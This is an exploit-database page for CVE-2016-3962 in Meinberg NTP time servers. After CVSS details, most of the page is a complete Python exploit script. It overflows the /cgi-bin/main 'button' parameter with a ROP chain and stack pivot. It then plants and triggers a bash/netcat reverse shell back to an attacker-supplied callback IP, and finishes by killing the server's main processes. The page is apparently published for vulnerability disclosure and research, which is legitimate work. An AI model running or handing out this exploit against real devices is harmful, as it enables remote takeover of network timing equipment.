Exploitalert - Database of Exploits

Meinberg NTP Time Server ELX800/GPS M4x 5.30p Command Execution

CVE	Category	Price	Severity
CVE-2016-3962	CWE-20	$2,500	High

Author	Risk	Exploitation Type	Date
Ken Pyle	High	Remote	2016-07-19

CPE
cpe:cpe:/a:meinberg:ntp_time_server_elx800_gps_m4x_5_30p

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2016070143

Meinberg NTP Time Server ELX800/GPS M4x 5.30p Command Execution#!/usr/bin/python # # EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit # EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/ # # 271 - trigger notifications # 299 - copy user defined notifications # Kernel Version: 2.6.15.1 # System Version: 530 # Lantime configuration utility 1.27 # ELX800/GPS M4x V5.30p import socket import struct import telnetlib import sys import time if len(sys.argv) < 3: print "[-] <Host> <Callback IP> " exit(1) host = sys.argv[1] callback_ip = sys.argv[2] print "[+] exploiting Meinburg M400" port = 80 ################################################################### # # Copy user_defined_notification to /www/filetmp # Append reverse shell string to /file/tmp # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 #must have a listener setup to receive the callback connection on ip 192.168.60.232 # i.e. nc -v -l -p 4444 command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;" >> /www/filetmp' msg = "button=" + "A"*10028 msg += struct.pack("I", system ) msg += struct.pack("I", exit ) msg += struct.pack("I", some_str ) msg += command + "\x00" resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close() time.sleep(1) ################################################################### # # Copy /www/filetmp to user_defined_notification # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" send_cmd = 0x807ED88 system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 ret = 0x804CE65 #stack pivot stack_pivot = 0x8049488 msg = "button=" + "A" * 9756 msg += "B" * 28 msg += struct.pack("I", 0x7FFEE01A ) # ebp msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret msg += struct.pack("I", some_str - 0x100 ) # some place msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret msg += struct.pack("I", ret ) * (71/4) msg += struct.pack("I", send_cmd ) msg += struct.pack("I", exit ) msg += struct.pack("I", 0x80012111 ) # [eax + 0x60] msg += struct.pack("I", some_str ) # buffer msg += struct.pack("I", 0xffffffff ) # count msg += "E" * 120 msg += struct.pack("I", 0xB1E8B434 ) # ebx msg += struct.pack("I", some_str - 100 ) # esi msg += struct.pack("I", some_str - 100 ) # edi msg += struct.pack("I", some_str - 0x100 ) # ebp msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret msg += "A" * 100 resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close time.sleep(1) ################################################################### # # Trigger reverse shell # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" send_cmd = 0x807ED88 system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 ret = 0x804CE65 #stack pivot stack_pivot = 0x8049488 msg = "button=" + "A" * 9756 msg += "B" * 28 msg += struct.pack("I", 0x7FFEE01A ) # ebp msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret msg += struct.pack("I", some_str - 0x100 ) # some place msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret msg += struct.pack("I", ret ) * (71/4) msg += struct.pack("I", send_cmd ) msg += struct.pack("I", exit ) msg += struct.pack("I", 0x800120f5 ) # [eax + 0x60] msg += struct.pack("I", some_str ) # buffer msg += struct.pack("I", 0xffffffff ) # count msg += "E" * 120 msg += struct.pack("I", 0xB1E8B434 ) # ebx msg += struct.pack("I", some_str - 100 ) # esi msg += struct.pack("I", some_str - 100 ) # edi msg += struct.pack("I", some_str - 0x100 ) # ebp msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret msg += "A" * 100 resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close() time.sleep(1) print "[+] cleaning up" ################################################################### # # Kill all mains that are hung-up # csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) param = "A" * 0x2850 resp = "POST /cgi-bin/main HTTP/1.1\r\n" resp += "Host: " + host + "\r\n" resp += "User-Agent: Mozilla/5.0\r\n" resp += "Accept: text/html\r\n" resp += "Accept-Language: en-US\r\n" resp += "Connection: keep-alive\r\n" resp += "Content-Type: application/x-www-form-urlencoded\r\n" system = 0x80490B0 exit = 0x80492C0 some_str = 0x850BDB8 command = 'killall main' msg = "button=" + "A"*10028 msg += struct.pack("I", system ) msg += struct.pack("I", exit ) msg += struct.pack("I", some_str ) msg += command + "\x00" resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n" resp += msg csock.send(resp) csock.close() print "[+] enjoy"

Impressum